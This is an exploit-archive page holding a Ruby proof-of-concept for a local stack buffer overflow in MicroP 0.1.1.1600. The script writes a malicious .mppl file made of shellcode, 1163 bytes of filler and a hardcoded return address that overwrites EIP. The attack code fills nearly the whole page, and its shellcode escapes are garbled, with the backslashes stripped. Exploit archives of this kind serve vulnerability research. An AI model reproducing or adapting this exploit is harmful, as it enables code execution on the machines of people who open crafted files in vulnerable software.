Home / exploitsPDF  

MicroP 0.1.1.1600 Buffer Overflow

Posted on 15 March 2014

#!/usr/bin/env ruby # Exploit Title:MicroP(.mppl) Local Stack Based Buffer Overflow # Author:Necmettin COSKUN => twitter.com/babayarisi # Blog : http://www.ncoskun.com http://www.grisapka.org # Vendor :http://sourceforge.net/projects/microp/ # Software link:http://sourceforge.net/projects/microp/files/latest/download # version: 0.1.1.1600 # Tested on: windows XP sp2 # 4ewa2getha! ;) print " " print " " print " by " print " _ _ _ v2 _ " print " | |_ ___| |_ ___ _ _ ___ ___|_|___|_| " print " | . | .'| . | .'| | | .'| _| |_ -| | " print " |___|__,|___|__,|_ |__,|_| |_|___|_| " print " |___| " print " " print " " print " " #shellcode = http://www.exploit-db.com/exploits/28996/ #User32-free Messagebox Shellcode for any Windows version babacode = "x31xd2xb2x30x64x8bx12x8bx52x0cx8bx52x1cx8bx42"+ "x08x8bx72x20x8bx12x80x7ex0cx33x75xf2x89xc7x03"+ "x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x31xedx8b"+ "x34xafx01xc6x45x81x3ex46x61x74x61x75xf2x81x7e"+ "x08x45x78x69x74x75xe9x8bx7ax24x01xc7x66x8bx2c"+ "x6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x68x79x74"+ "x65x01x68x6bx65x6ex42x68x20x42x72x6fx89xe1xfe"+ "x49x0bx31xc0x51x50xffxd7" dolgu = "x41" * 1163 eip = [0x100145B5].pack('V') bumbala=babacode+dolgu+eip File.open('baba.mppl', 'w') do |bofdosya| bofdosya.puts (bumbala) bofdosya.close() end

 

TOP